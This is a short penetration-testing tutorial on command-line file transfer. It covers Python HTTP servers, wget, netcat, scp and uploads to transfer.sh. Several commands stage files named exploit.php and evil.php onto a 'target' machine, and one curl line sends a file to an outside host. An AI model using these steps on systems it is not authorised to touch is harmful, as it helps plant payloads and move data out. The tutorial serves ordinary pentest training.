Transferring exploits, python scripts, and loading modules are often needed during penetration testing activities. Since the terminal is the tool used mostly, its essential to understand the basics of the file transfer.
A pen tester should be well equipped with different tricks to transfer files from a remote server as well from one directory to another. In this tutorial, we shall discuss different ways to transfer files using the command-line.
1. Python Server
Python is the basic package that comes preinstalled in almost all the Debian based systems. To transfer a file from one machine to another, do the following;
Switch to the directory where your file that you want to transfer exists. Start a simple python server. Enter the following command;
$ python -m SimpleHTTPServer 8080
Now go to the machine where you want to transfer the file. Use the following command to download the file;
$ wget http://192.168.43.177:8080/file
Remember to replace the IP, Port number & name of the file.
Anything written in python2 will almost always break in python3. So we also look at how to transfer a file using python3.
In the case of python3, enter the following command to start a simple python server.
$ python3 -m http.server 8080
To download the file on the target, enter the following command;
$ wget http://192.168.43.177:8080/exploit.php
Netcat is a powerful utility to transfer files from any remote machine to a local machine. It may not always be installed. You can check whether it exists or not by entering;
$ which netcat
Alternatively, by entering;
$ which nc
Make a netcat server with the following command;
$ nc -nlvp 8080 < evil.php
Now go to the target machine and enter the following to download the file;
$ nc -nv 192.168.43.177 8080 > evil.php
netcat in the above commands if nc doesn’t work or is not installed correctly.
Secure Copy Protocol is a powerful tool for transferring files. It comes in handy especially when you want to transfer directories. Its also mostly used for file transfers over ssh.
For transfer file via ssh, enter the following command on sending machine;
$ scp -i new.pem test.py email@example.com:/home/ubuntu
Where -i represents the public key for ssh login, test.py is the file to be transferred and /home/ubuntu is the target directory where we want to save the file.
To download a file from the remote machine, enter the following command;
$ scp firstname.lastname@example.org:/remote_directory/file /local/directory
You can use this third-party tool to transfer files. It can be useful when you don’t have a machine with public IP, and you still have to transfer the files. The following command uploads the file to the transfer.sh servers;
$ curl --upload-file ./file.txt https://transfer.sh/file.txt
To download the file, enter the following command;
$ curl https://transfer.sh//file.txt -o file.txt
Transfer.sh is still under development and may not work always.
Command-line tools give us the ability to transfer files in various ways. They may seem a bit complicated but getting hands-on them gives the capability to easily manage files, especially when a GUI option is not available.